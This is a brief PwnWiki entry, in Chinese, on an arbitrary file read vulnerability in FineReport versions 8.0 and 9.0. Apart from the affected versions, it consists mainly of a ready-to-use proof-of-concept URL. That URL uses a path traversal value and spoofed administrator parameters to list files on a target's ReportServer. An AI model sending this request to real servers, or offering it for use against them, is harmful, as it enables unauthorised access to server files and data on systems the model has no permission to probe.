FineReport v8.0 - 9.0 任意文件讀取漏洞

From PwnWiki
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影響

FineReport v8.0
FineReport v9.0

POC

http://<target>/WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..&currentUserName=admin&currentUserId=1&isWebReport=true
Retrieved from "https://pwnwiki.com/index.php?title=FineReport_v8.0_-_9.0_任意文件讀取漏洞&oldid=4913"